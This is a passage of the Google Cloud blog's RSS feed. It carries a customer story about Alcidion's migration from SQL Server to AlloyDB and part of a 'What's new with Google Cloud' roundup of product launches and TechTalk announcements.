To learn more about how Google AI Threat Defense and Google Security Operations can help you fight AI with AI, check out our &lt;a href="https://cloudonair.withgoogle.com/events/google-cloud-security-talks-june-2026?utm_source=cgc-blog&amp;amp;utm_medium=blog&amp;amp;utm_campaign=FY26-Q2-GLOBAL-STO55-onlineevent-er-dgcsm-JuneSecTl-172732&amp;amp;utm_content=blog&amp;amp;utm_term=-" target="_blank"&gt;Security Talks online event on June 10&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;</description><pubDate>Tue, 09 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/</guid><category>AI &amp; Machine Learning</category><category>Security &amp; Identity</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Detecting_and_containing_AI-powered_threats_.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Detecting and containing AI-powered threats with Google Security Operations agents</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Detecting_and_containing_AI-powered_threats_.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/identity-security/detecting-and-containing-powered-threats-with-google-security-operations-agents/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Jon Ramsey</name><title>VP &amp; GM, Google Cloud Security</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Payal Chakravarty</name><title>Director of Product Management, Google Cloud</title><department></department><company></company></author></item><item><title>Modernizing Healthcare: How Alcidion achieved greater stability and performance with 
AlloyDB</title><link>https://cloud.google.com/blog/products/databases/modernizing-healthcare-how-alcidion-achieved-greater-stability-and-performance/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In clinical informatics, every second counts. For &lt;/span&gt;&lt;a href="https://www.alcidion.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Alcidion&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, a global leader in smart health solutions, the mission is simple but critical: use technology to reduce cognitive load for clinicians and present the right information at the right time to save lives.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether it’s managing patient flow in an emergency department or ensuring a patient is in the correct ward to avoid adverse outcomes, Alcidion’s flagship platform, &lt;/span&gt;&lt;a href="https://www.alcidion.com/platform/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Miya Precision&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, serves as a dynamic intelligent care platform for modern hospitals. To power this mission, the platform recently underwent a major architectural transformation, migrating from a legacy Microsoft SQL Server environment to Google Cloud’s &lt;/span&gt;&lt;a href="https://cloud.google.com/products/alloydb"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB for PostgreSQL&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;The challenge: overcoming performance bottlenecks&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Operating in an industry where data integrity and uptime are non-negotiable, Alcidion faced several technical and operational hurdles with its previous setup:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Operational overhead:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Managing persistent backends for SQL Server required significant manual effort. The team had to manually balance database loads between elastic pools to maintain performance while trying to optimize costs. They also had to constantly manage the gap between allocated and used space to prevent shared pools from being consumed by excessive slack space.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Performance latency:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Complex JSON data processing, critical for modern health informatics, was taking up to 30 minutes for certain jobs.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Stability concerns:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The team sought a more stable Kubernetes environment and a persistent backend that could scale without constant administrative intervention.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;The solution: a smooth migration to AlloyDB&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alcidion used the &lt;/span&gt;&lt;a href="https://cloud.google.com/database-migration"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Database Migration Service&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; (DMS) to move from SQL Server to AlloyDB, achieving a remarkably efficient cutover. The total learning and migration process took under one month, with the core database move completed in only one and a half weeks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By creating custom synchronization tools and using Google Cloud’s managed services, the team reduced the final transition window to just 15 minutes. Alcidion achieved this by spinning up a new Google Cloud instance synchronized to the active one, with both accessible via unique fully qualified domain names. The new environment remained in read-only mode for customer validation. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;During the final cutover, the old instance was set to read-only, synchronization was halted, and external integration links were toggled to the new environment. This streamlined process allowed users to log into the new instance and resume work within minutes, with the primary delay being DNS record updates.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alcidion chose a fully managed AlloyDB service to eliminate control plane tasks and administrative overhead. This shift allows their engineering team to focus on clinical innovation and product development rather than "managing the container" or the underlying database infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Cutting over to AlloyDB in about 15 minutes had users back to work almost immediately. For a system clinicians rely on around the clock, that smooth transition gave Alcidion real confidence.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;The results: impact by the numbers&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The shift to AlloyDB and Google’s &lt;/span&gt;&lt;a href="https://cloud.google.com/data-cloud"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; has delivered immediate, quantifiable improvements for Alcidion and its healthcare customers:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Faster data processing:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Data processing that previously relied on SQL Server stored procedures — a process that became increasingly time-consuming as data volumes grew — has been transformed. By migrating to AlloyDB and using &lt;/span&gt;&lt;a href="https://cloud.google.com/bigquery"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;BigQuery&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and Dataflow for processing, Alcidion has seen jobs that once took 30 minutes now complete in just 5 to 60 seconds.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Enhanced stability:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The migration has delivered a step-change in reliability. In the previous environment, the team faced monthly disruptions, ranging from failed scheduled maintenance to connectivity issues that required manual intervention. In contrast, AlloyDB and Google Cloud’s compute services have proven exceptionally stable, allowing the team to move away from the "firefighting" mode associated with frequent infrastructure crashes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Reduced cognitive load:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; By simplifying their backend and clinical dashboards, Alcidion’s SREs have significantly reduced their administrative burden. This shift has freed the team to focus on high-value innovation, such as refining predictive analytics and generative AI that empower clinicians to make informed clinical decisions faster.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong style="vertical-align: baseline;"&gt;Future vision: AI and beyond&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Alcidion isn't stopping at database modernization. The move to AlloyDB is a foundational step for their next phase of growth:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;AlloyDB columnar engine:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The team is exploring the columnar engine for a second round of query optimization and real-time analytics.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;strong style="vertical-align: baseline;"&gt;Generative AI apps:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Alcidion is actively working with Google to use AlloyDB’s &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/introducing-gemini-enterprise-agent-platform"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; integration to perform concept analysis and pick out critical clinical insights from vast datasets.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By moving to AlloyDB, Alcidion has improved its stability and performance and built a strong foundation to keep delivering smarter, safer care to hospitals worldwide.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="font-style: italic; vertical-align: baseline;"&gt;Ready to modernize your database?&lt;/strong&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; Learn more about how&lt;/span&gt;&lt;a href="https://cloud.google.com/alloydb"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="font-style: italic; text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/span&gt;&lt;/a&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt; can transform your operational workloads.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</description><pubDate>Mon, 08 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/databases/modernizing-healthcare-how-alcidion-achieved-greater-stability-and-performance/</guid><category>AI &amp; Machine Learning</category><category>Data Analytics</category><category>Customers</category><category>Databases</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/Alcidion-Hero.max-600x600.png" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>Modernizing Healthcare: How Alcidion achieved greater stability and performance with AlloyDB</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/Alcidion-Hero.max-600x600.png</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/databases/modernizing-healthcare-how-alcidion-achieved-greater-stability-and-performance/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Raj Pai</name><title>VP, Google Databases</title><department></department><company></company></author><author xmlns:author="http://www.w3.org/2005/Atom"><name>Stephen Ridley</name><title>Alcidion, Director of SRE and Platform Operations</title><department></department><company></company></author></item><item><title>What’s new with Google 
Cloud</title><link>https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/</link><description>&lt;div class="block-paragraph"&gt;&lt;p data-block-key="kgod7"&gt;Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. &lt;/p&gt;&lt;hr/&gt;&lt;p data-block-key="ru1z9"&gt;&lt;b&gt;Tip&lt;/b&gt;: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: &lt;a href="https://cloud.google.com/blog/topics/inside-google-cloud/complete-list-google-cloud-blog-links-2021"&gt;Google Cloud blog 101: Full list of topics, links, and resources&lt;/a&gt;.&lt;/p&gt;&lt;hr/&gt;&lt;p data-block-key="b0lnw"&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-aside"&gt;&lt;dl&gt;
    &lt;dt&gt;aside_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: []&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Jun 1 - Jun 5&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Modeling the physical world with BigQuery Graph&lt;/strong&gt;&lt;br/&gt;Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this &lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/blog/products/data-analytics/modeling-a-digital-twin-using-bigquery-graph" rel="noreferrer noopener" target="_blank"&gt;post&lt;/a&gt;, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)&lt;br/&gt;&lt;/strong&gt;Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.&lt;br/&gt;&lt;br/&gt;&lt;a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4dyC2Ie" rel="noreferrer noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 18 Spanish Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;May 25 - May 29&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.anthropic.com/news/claude-opus-4-8" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Anthropic’s Claude Opus 4.8&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is now available on &lt;/span&gt;&lt;a href="https://console.cloud.google.com/vertex-ai/publishers/anthropic/model-garden/claude-opus-4-8"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Platform&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;. &lt;/strong&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs &lt;br/&gt;&lt;/strong&gt;Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.&lt;strong&gt;&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4dTxQmo" rel="noopener" target="_blank"&gt;Register now&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Securing AI Agents: The Extended Agent Gateway Pattern&lt;br/&gt;&lt;/strong&gt;Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4fbAsxg" rel="noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 4 Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP&lt;br/&gt;&lt;/strong&gt;Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4nVyjIr" rel="noopener" target="_blank"&gt;&lt;strong&gt;Register for the June 11 Community TechTalk&lt;/strong&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;May 18 - May 22&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Chinese Webinar | June 4: AI Command and Control&lt;br/&gt;&lt;/strong&gt;As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4dx4Lf5" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;Register here&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases&lt;br/&gt;&lt;/strong&gt;Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/benchmark-llms-on-device-with-ai-edge-portal" rel="noopener" target="_blank"&gt;capabilities&lt;/a&gt; to benchmark and debug LLM performance across these devices. &lt;a href="https://docs.google.com/forms/d/e/1FAIpQLSfTcGPycQve8TLAsfH46pBlXBZe9FrgJAClwbF7DeL1LgVn4Q/viewform" rel="noopener" target="_blank"&gt;Sign up&lt;/a&gt; to use these new features in private preview today.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;May 11 - May 15&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Build Your AI &amp;amp; MCP Control Tower for Universal Governance&lt;br/&gt;&lt;/strong&gt;Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4u9slWF" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;Register for the May 21 Community TechTalk&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 27 - May 1&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Master Your Launch: The Apigee Production Go-Live Checklist&lt;br/&gt;&lt;/strong&gt;Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.&lt;br/&gt;&lt;br/&gt;&lt;strong style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;a href="https://goo.gle/4elMCTI" rel="noopener" target="_blank"&gt;Register for the May 28 Community TechTalk&lt;/a&gt;&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform&lt;br/&gt;&lt;/strong&gt;&lt;span style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/3PfWm7M" rel="noopener" target="_blank"&gt;Register for the May 7 Community TechTalk&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.cloud.google.com/compute/docs/accelerator-optimized-machines#g4-machine-types" rel="noopener" target="_blank"&gt;Fractional G4 VMs&lt;/a&gt; are Generaly Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;1/2 GPU:&lt;/strong&gt; Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;1/4 GPU:&lt;/strong&gt; Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;1/8 GPU:&lt;/strong&gt; Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI &amp;amp; Agentic solutions are robust, secure, and ready for the real world.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lnkd.in/gHBH8cTv" rel="noopener" target="_blank"&gt;Watch the deep dive&lt;/a&gt; and &lt;a href="https://discuss.google.dev/t/beyond-the-prototype-scaling-production-grade-agents-with-gemini/356140" rel="noopener" target="_blank"&gt;read the developer blog&lt;/a&gt; to learn more.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available&lt;br/&gt;&lt;/strong&gt;Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Install from Marketplace:&lt;/strong&gt; &lt;a href="https://marketplace.visualstudio.com/items?itemName=GoogleCloudTools.workbench-notebooks" rel="noopener" target="_blank"&gt;GoogleCloudTools.workbench-notebooks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Contribute on GitHub:&lt;/strong&gt; &lt;a href="https://github.com/GoogleCloudPlatform/colab-enterprise-vscode" rel="noopener" target="_blank"&gt;colab-enterprise-vscode&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 20 - Apr 24&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Announcing the 2026 Google Cloud Partners of the Year&lt;br/&gt;&lt;/strong&gt;Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.&lt;br/&gt;&lt;br/&gt;See the &lt;a href="https://cloud.google.com/blog/topics/partners/2026-partners-of-the-year-winners-next26"&gt;2026 Partner Award winners&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Apr 13 - Apr 17&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;We're excited to announce the &lt;strong&gt;Public Preview of Datastream’s metadata integration with Knowledge Catalog&lt;/strong&gt;. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Upgrading Apigee OPDK to 4.53 with OS Modernization&lt;br/&gt;&lt;/strong&gt;Modernize your infrastructure using Google’s official, sequential upgrade path. Our technical expert, Rakesh Talanki, outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/3Oa8uqy" rel="noopener" target="_blank"&gt;Read the guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale&lt;br/&gt;&lt;/strong&gt;Google Cloud has announced the General Availability of &lt;strong&gt;Cloud Run worker pools&lt;/strong&gt;, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the &lt;strong&gt;Cloud Run External Metrics Autoscaler (CREMA)&lt;/strong&gt;. Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.&lt;/li&gt;
